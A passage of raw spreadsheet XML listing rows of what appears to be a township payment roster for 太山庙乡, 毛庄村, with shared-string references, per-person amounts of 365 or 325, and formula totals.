      <c r="F2008" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2008" s="24">
        <v>1</v>
      </c>
      <c r="H2008" s="25">
        <v>365</v>
      </c>
      <c r="I2008" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2008" s="41">
        <v>45108</v>
      </c>
      <c r="K2008" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2009" customHeight="1" spans="1:11">
      <c r="A2009" s="23" t="s">
        <v>5338</v>
      </c>
      <c r="B2009" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2009" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2009" s="24" t="s">
        <v>5340</v>
      </c>
      <c r="E2009" s="24" t="s">
        <v>4775</v>
      </c>
      <c r="F2009" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2009" s="24">
        <v>1</v>
      </c>
      <c r="H2009" s="25">
        <v>365</v>
      </c>
      <c r="I2009" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2009" s="41">
        <v>45108</v>
      </c>
      <c r="K2009" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2010" customHeight="1" spans="1:11">
      <c r="A2010" s="23" t="s">
        <v>5341</v>
      </c>
      <c r="B2010" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2010" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2010" s="24" t="s">
        <v>5342</v>
      </c>
      <c r="E2010" s="24" t="s">
        <v>4993</v>
      </c>
      <c r="F2010" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2010" s="24">
        <v>1</v>
      </c>
      <c r="H2010" s="25">
        <v>365</v>
      </c>
      <c r="I2010" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2010" s="24">
        <v>45352</v>
      </c>
      <c r="K2010" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2011" customHeight="1" spans="1:11">
      <c r="A2011" s="23" t="s">
        <v>5343</v>
      </c>
      <c r="B2011" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2011" s="24" t="s">
        <v>5344</v>
      </c>
      <c r="D2011" s="24" t="s">
        <v>5345</v>
      </c>
      <c r="E2011" s="24" t="s">
        <v>4825</v>
      </c>
      <c r="F2011" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2011" s="24">
        <v>1</v>
      </c>
      <c r="H2011" s="25">
        <v>365</v>
      </c>
      <c r="I2011" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2011" s="24">
        <v>45413</v>
      </c>
      <c r="K2011" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2012" customHeight="1" spans="1:11">
      <c r="A2012" s="23" t="s">
        <v>5346</v>
      </c>
      <c r="B2012" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2012" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="D2012" s="24" t="s">
        <v>5347</v>
      </c>
      <c r="E2012" s="24" t="s">
        <v>5348</v>
      </c>
      <c r="F2012" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2012" s="24">
        <v>1</v>
      </c>
      <c r="H2012" s="25">
        <v>365</v>
      </c>
      <c r="I2012" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2012" s="41">
        <v>45658</v>
      </c>
      <c r="K2012" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2013" customHeight="1" spans="1:11">
      <c r="A2013" s="23" t="s">
        <v>5349</v>
      </c>
      <c r="B2013" s="24" t="s">
        <v>4707</v>
      </c>
      <c r="C2013" s="24" t="s">
        <v>5339</v>
      </c>
      <c r="D2013" s="24" t="s">
        <v>5350</v>
      </c>
      <c r="E2013" s="24" t="s">
        <v>4752</v>
      </c>
      <c r="F2013" s="24" t="s">
        <v>5334</v>
      </c>
      <c r="G2013" s="24">
        <v>1</v>
      </c>
      <c r="H2013" s="25">
        <v>365</v>
      </c>
      <c r="I2013" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2013" s="41">
        <v>45108</v>
      </c>
      <c r="K2013" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2014" customHeight="1" spans="1:11">
      <c r="A2014" s="23" t="s">
        <v>5351</v>
      </c>
      <c r="B2014" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2014" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2014" s="24" t="s">
        <v>5354</v>
      </c>
      <c r="E2014" s="24" t="s">
        <v>5355</v>
      </c>
      <c r="F2014" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2014" s="24">
        <v>1</v>
      </c>
      <c r="H2014" s="25">
        <v>365</v>
      </c>
      <c r="I2014" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2014" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2014" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2015" customHeight="1" spans="1:11">
      <c r="A2015" s="23" t="s">
        <v>5356</v>
      </c>
      <c r="B2015" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2015" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2015" s="24" t="s">
        <v>5357</v>
      </c>
      <c r="E2015" s="24" t="s">
        <v>4359</v>
      </c>
      <c r="F2015" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2015" s="24">
        <v>1</v>
      </c>
      <c r="H2015" s="25">
        <v>365</v>
      </c>
      <c r="I2015" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2015" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2015" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2016" customHeight="1" spans="1:11">
      <c r="A2016" s="23" t="s">
        <v>5358</v>
      </c>
      <c r="B2016" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2016" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2016" s="24" t="s">
        <v>5359</v>
      </c>
      <c r="E2016" s="24" t="s">
        <v>5360</v>
      </c>
      <c r="F2016" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2016" s="24">
        <v>1</v>
      </c>
      <c r="H2016" s="25">
        <v>365</v>
      </c>
      <c r="I2016" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2016" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2016" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2017" customHeight="1" spans="1:11">
      <c r="A2017" s="23" t="s">
        <v>5361</v>
      </c>
      <c r="B2017" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2017" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2017" s="24" t="s">
        <v>5362</v>
      </c>
      <c r="E2017" s="24" t="s">
        <v>5363</v>
      </c>
      <c r="F2017" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2017" s="24">
        <v>1</v>
      </c>
      <c r="H2017" s="25">
        <v>365</v>
      </c>
      <c r="I2017" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2017" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2017" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2018" customHeight="1" spans="1:11">
      <c r="A2018" s="23" t="s">
        <v>5364</v>
      </c>
      <c r="B2018" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2018" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2018" s="24" t="s">
        <v>5365</v>
      </c>
      <c r="E2018" s="24" t="s">
        <v>5058</v>
      </c>
      <c r="F2018" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2018" s="24">
        <v>1</v>
      </c>
      <c r="H2018" s="25">
        <v>365</v>
      </c>
      <c r="I2018" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2018" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2018" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2019" customHeight="1" spans="1:11">
      <c r="A2019" s="23" t="s">
        <v>5366</v>
      </c>
      <c r="B2019" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2019" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2019" s="24" t="s">
        <v>5367</v>
      </c>
      <c r="E2019" s="24" t="s">
        <v>5368</v>
      </c>
      <c r="F2019" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2019" s="24">
        <v>1</v>
      </c>
      <c r="H2019" s="25">
        <v>365</v>
      </c>
      <c r="I2019" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2019" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2019" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2020" customHeight="1" spans="1:11">
      <c r="A2020" s="23" t="s">
        <v>5369</v>
      </c>
      <c r="B2020" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2020" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2020" s="24" t="s">
        <v>5370</v>
      </c>
      <c r="E2020" s="24" t="s">
        <v>5371</v>
      </c>
      <c r="F2020" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2020" s="24">
        <v>2</v>
      </c>
      <c r="H2020" s="25">
        <v>325</v>
      </c>
      <c r="I2020" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2020" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2020" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2021" customHeight="1" spans="1:11">
      <c r="A2021" s="23" t="s">
        <v>5372</v>
      </c>
      <c r="B2021" s="24" t="str">
        <f>B2020</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2021" s="24" t="str">
        <f>C2020</f>
        <v>毛庄村</v>
      </c>
      <c r="D2021" s="23" t="s">
        <v>5373</v>
      </c>
      <c r="E2021" s="23" t="s">
        <v>5374</v>
      </c>
      <c r="F2021" s="24">
        <f>F2020</f>
        <v>4113210704</v>
      </c>
      <c r="G2021" s="24"/>
      <c r="H2021" s="24"/>
      <c r="I2021" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2021" s="24"/>
      <c r="K2021" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2022" customHeight="1" spans="1:11">
      <c r="A2022" s="23" t="s">
        <v>5375</v>
      </c>
      <c r="B2022" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2022" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2022" s="24" t="s">
        <v>5376</v>
      </c>
      <c r="E2022" s="24" t="s">
        <v>5377</v>
      </c>
      <c r="F2022" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2022" s="24">
        <v>1</v>
      </c>
      <c r="H2022" s="25">
        <v>365</v>
      </c>
      <c r="I2022" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2022" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2022" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2023" customHeight="1" spans="1:11">
      <c r="A2023" s="23" t="s">
        <v>5378</v>
      </c>
      <c r="B2023" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2023" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2023" s="24" t="s">
        <v>5379</v>
      </c>
      <c r="E2023" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2023" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2023" s="24">
        <v>1</v>
      </c>
      <c r="H2023" s="25">
        <v>365</v>
      </c>
      <c r="I2023" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2023" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2023" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2024" customHeight="1" spans="1:11">
      <c r="A2024" s="23" t="s">
        <v>5381</v>
      </c>
      <c r="B2024" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2024" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2024" s="24" t="s">
        <v>5382</v>
      </c>
      <c r="E2024" s="24" t="s">
        <v>2797</v>
      </c>
      <c r="F2024" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2024" s="24">
        <v>1</v>
      </c>
      <c r="H2024" s="25">
        <v>365</v>
      </c>
      <c r="I2024" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2024" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2024" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2025" customHeight="1" spans="1:11">
      <c r="A2025" s="23" t="s">
        <v>5383</v>
      </c>
      <c r="B2025" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2025" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2025" s="24" t="s">
        <v>5384</v>
      </c>
      <c r="E2025" s="24" t="s">
        <v>5385</v>
      </c>
      <c r="F2025" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2025" s="24">
        <v>1</v>
      </c>
      <c r="H2025" s="25">
        <v>365</v>
      </c>
      <c r="I2025" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2025" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2025" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2026" customHeight="1" spans="1:11">
      <c r="A2026" s="23" t="s">
        <v>5386</v>
      </c>
      <c r="B2026" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2026" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2026" s="24" t="s">
        <v>5387</v>
      </c>
      <c r="E2026" s="24" t="s">
        <v>5355</v>
      </c>
      <c r="F2026" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2026" s="24">
        <v>1</v>
      </c>
      <c r="H2026" s="25">
        <v>365</v>
      </c>
      <c r="I2026" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2026" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2026" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2027" customHeight="1" spans="1:11">
      <c r="A2027" s="23" t="s">
        <v>5388</v>
      </c>
      <c r="B2027" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2027" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2027" s="24" t="s">
        <v>5389</v>
      </c>
      <c r="E2027" s="24" t="s">
        <v>5390</v>
      </c>
      <c r="F2027" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2027" s="24">
        <v>1</v>
      </c>
      <c r="H2027" s="25">
        <v>365</v>
      </c>
      <c r="I2027" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2027" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2027" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2028" customHeight="1" spans="1:11">
      <c r="A2028" s="23" t="s">
        <v>5391</v>
      </c>
      <c r="B2028" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2028" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2028" s="24" t="s">
        <v>5392</v>
      </c>
      <c r="E2028" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2028" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2028" s="24">
        <v>1</v>
      </c>
      <c r="H2028" s="25">
        <v>365</v>
      </c>
      <c r="I2028" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2028" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2028" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2029" customHeight="1" spans="1:11">
      <c r="A2029" s="23" t="s">
        <v>5393</v>
      </c>
      <c r="B2029" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2029" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2029" s="24" t="s">
        <v>5394</v>
      </c>
      <c r="E2029" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2029" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2029" s="24">
        <v>1</v>
      </c>
      <c r="H2029" s="25">
        <v>365</v>
      </c>
      <c r="I2029" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2029" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2029" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2030" customHeight="1" spans="1:11">
      <c r="A2030" s="23" t="s">
        <v>5395</v>
      </c>
      <c r="B2030" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2030" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2030" s="24" t="s">
        <v>5396</v>
      </c>
      <c r="E2030" s="24" t="s">
        <v>5397</v>
      </c>
      <c r="F2030" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2030" s="24">
        <v>1</v>
      </c>
      <c r="H2030" s="25">
        <v>365</v>
      </c>
      <c r="I2030" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2030" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2030" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2031" customHeight="1" spans="1:11">
      <c r="A2031" s="23" t="s">
        <v>5398</v>
      </c>
      <c r="B2031" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2031" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2031" s="24" t="s">
        <v>5399</v>
      </c>
      <c r="E2031" s="24" t="s">
        <v>5400</v>
      </c>
      <c r="F2031" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2031" s="24">
        <v>1</v>
      </c>
      <c r="H2031" s="25">
        <v>365</v>
      </c>
      <c r="I2031" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2031" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2031" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2032" customHeight="1" spans="1:11">
      <c r="A2032" s="23" t="s">
        <v>5401</v>
      </c>
      <c r="B2032" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2032" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2032" s="24" t="s">
        <v>5402</v>
      </c>
      <c r="E2032" s="24" t="s">
        <v>5403</v>
      </c>
      <c r="F2032" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2032" s="24">
        <v>2</v>
      </c>
      <c r="H2032" s="25">
        <v>325</v>
      </c>
      <c r="I2032" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2032" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2032" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2033" customHeight="1" spans="1:11">
      <c r="A2033" s="23" t="s">
        <v>5404</v>
      </c>
      <c r="B2033" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2033" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2033" s="24" t="s">
        <v>5405</v>
      </c>
      <c r="E2033" s="24" t="s">
        <v>5406</v>
      </c>
      <c r="F2033" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2033" s="24"/>
      <c r="I2033" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2033" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2033" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2034" customHeight="1" spans="1:11">
      <c r="A2034" s="23" t="s">
        <v>5407</v>
      </c>
      <c r="B2034" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2034" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2034" s="24" t="s">
        <v>5408</v>
      </c>
      <c r="E2034" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2034" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2034" s="24">
        <v>1</v>
      </c>
      <c r="H2034" s="25">
        <v>365</v>
      </c>
      <c r="I2034" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2034" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2034" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2035" customHeight="1" spans="1:11">
      <c r="A2035" s="23" t="s">
        <v>5409</v>
      </c>
      <c r="B2035" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2035" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2035" s="24" t="s">
        <v>5410</v>
      </c>
      <c r="E2035" s="24" t="s">
        <v>5411</v>
      </c>
      <c r="F2035" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2035" s="24">
        <v>2</v>
      </c>
      <c r="H2035" s="25">
        <v>325</v>
      </c>
      <c r="I2035" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2035" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2035" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2036" customHeight="1" spans="1:11">
      <c r="A2036" s="23" t="s">
        <v>5412</v>
      </c>
      <c r="B2036" s="24" t="str">
        <f>B2035</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2036" s="24" t="str">
        <f>C2035</f>
        <v>毛庄村</v>
      </c>
      <c r="D2036" s="23" t="s">
        <v>5413</v>
      </c>
      <c r="E2036" s="23" t="s">
        <v>5414</v>
      </c>
      <c r="F2036" s="24">
        <f>F2035</f>
        <v>4113210704</v>
      </c>
      <c r="G2036" s="24"/>
      <c r="H2036" s="24"/>
      <c r="I2036" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2036" s="24"/>
      <c r="K2036" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2037" customHeight="1" spans="1:11">
      <c r="A2037" s="23" t="s">
        <v>5415</v>
      </c>
      <c r="B2037" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2037" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2037" s="24" t="s">
        <v>5416</v>
      </c>
      <c r="E2037" s="24" t="s">
        <v>2797</v>
      </c>
      <c r="F2037" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2037" s="24">
        <v>2</v>
      </c>
      <c r="H2037" s="25">
        <v>325</v>
      </c>
      <c r="I2037" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2037" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2037" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2038" customHeight="1" spans="1:11">
      <c r="A2038" s="23" t="s">
        <v>5417</v>
      </c>
      <c r="B2038" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2038" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2038" s="24" t="s">
        <v>5418</v>
      </c>
      <c r="E2038" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2038" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2038" s="24"/>
      <c r="I2038" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2038" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2038" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2039" customHeight="1" spans="1:11">
      <c r="A2039" s="23" t="s">
        <v>5420</v>
      </c>
      <c r="B2039" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2039" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2039" s="24" t="s">
        <v>5421</v>
      </c>
      <c r="E2039" s="24" t="s">
        <v>5422</v>
      </c>
      <c r="F2039" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2039" s="24">
        <v>1</v>
      </c>
      <c r="H2039" s="25">
        <v>365</v>
      </c>
      <c r="I2039" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2039" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2039" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2040" customHeight="1" spans="1:11">
      <c r="A2040" s="23" t="s">
        <v>5423</v>
      </c>
      <c r="B2040" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2040" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2040" s="24" t="s">
        <v>5424</v>
      </c>
      <c r="E2040" s="24" t="s">
        <v>5425</v>
      </c>
      <c r="F2040" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2040" s="24">
        <v>2</v>
      </c>
      <c r="H2040" s="25">
        <v>325</v>
      </c>
      <c r="I2040" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2040" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2040" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2041" customHeight="1" spans="1:11">
      <c r="A2041" s="23" t="s">
        <v>5426</v>
      </c>
      <c r="B2041" s="24" t="str">
        <f>B2040</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2041" s="24" t="str">
        <f>C2040</f>
        <v>毛庄村</v>
      </c>
      <c r="D2041" s="23" t="s">
        <v>5427</v>
      </c>
      <c r="E2041" s="23" t="s">
        <v>5419</v>
      </c>
      <c r="F2041" s="24">
        <f>F2040</f>
        <v>4113210704</v>
      </c>
      <c r="G2041" s="24"/>
      <c r="H2041" s="24"/>
      <c r="I2041" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2041" s="24"/>
      <c r="K2041" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2042" customHeight="1" spans="1:11">
      <c r="A2042" s="23" t="s">
        <v>5428</v>
      </c>
      <c r="B2042" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2042" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2042" s="24" t="s">
        <v>5429</v>
      </c>
      <c r="E2042" s="24" t="s">
        <v>5363</v>
      </c>
      <c r="F2042" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2042" s="24">
        <v>2</v>
      </c>
      <c r="H2042" s="25">
        <v>345</v>
      </c>
      <c r="I2042" s="24">
        <f t="shared" si="31"/>
        <v>690</v>
      </c>
      <c r="J2042" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2042" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2043" customHeight="1" spans="1:11">
      <c r="A2043" s="23" t="s">
        <v>5430</v>
      </c>
      <c r="B2043" s="24" t="str">
        <f>B2042</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2043" s="24" t="str">
        <f>C2042</f>
        <v>毛庄村</v>
      </c>
      <c r="D2043" s="23" t="s">
        <v>5431</v>
      </c>
      <c r="E2043" s="23" t="s">
        <v>5432</v>
      </c>
      <c r="F2043" s="24">
        <f>F2042</f>
        <v>4113210704</v>
      </c>
      <c r="G2043" s="24"/>
      <c r="H2043" s="24"/>
      <c r="I2043" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2043" s="24"/>
      <c r="K2043" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2044" customHeight="1" spans="1:11">
      <c r="A2044" s="23" t="s">
        <v>5433</v>
      </c>
      <c r="B2044" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2044" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2044" s="24" t="s">
        <v>5434</v>
      </c>
      <c r="E2044" s="24" t="s">
        <v>5435</v>
      </c>
      <c r="F2044" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2044" s="24">
        <v>2</v>
      </c>
      <c r="H2044" s="25">
        <v>325</v>
      </c>
      <c r="I2044" s="24">
        <f t="shared" si="31"/>
        <v>650</v>
      </c>
      <c r="J2044" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2044" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2045" customHeight="1" spans="1:11">
      <c r="A2045" s="23" t="s">
        <v>5436</v>
      </c>
      <c r="B2045" s="24" t="str">
        <f>B2044</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2045" s="24" t="str">
        <f>C2044</f>
        <v>毛庄村</v>
      </c>
      <c r="D2045" s="23" t="s">
        <v>5437</v>
      </c>
      <c r="E2045" s="23" t="s">
        <v>5438</v>
      </c>
      <c r="F2045" s="24">
        <f>F2044</f>
        <v>4113210704</v>
      </c>
      <c r="G2045" s="24"/>
      <c r="H2045" s="24"/>
      <c r="I2045" s="24">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="J2045" s="24"/>
      <c r="K2045" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2046" customHeight="1" spans="1:11">
      <c r="A2046" s="23" t="s">
        <v>5439</v>
      </c>
      <c r="B2046" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2046" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2046" s="24" t="s">
        <v>5440</v>
      </c>
      <c r="E2046" s="24" t="s">
        <v>5422</v>
      </c>
      <c r="F2046" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2046" s="24">
        <v>1</v>
      </c>
      <c r="H2046" s="25">
        <v>365</v>
      </c>
      <c r="I2046" s="24">
        <f t="shared" si="31"/>
        <v>365</v>
      </c>
      <c r="J2046" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2046" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2047" customHeight="1" spans="1:11">
      <c r="A2047" s="23" t="s">
        <v>5441</v>
      </c>
      <c r="B2047" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2047" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2047" s="24" t="s">
        <v>5442</v>
      </c>
      <c r="E2047" s="24" t="s">
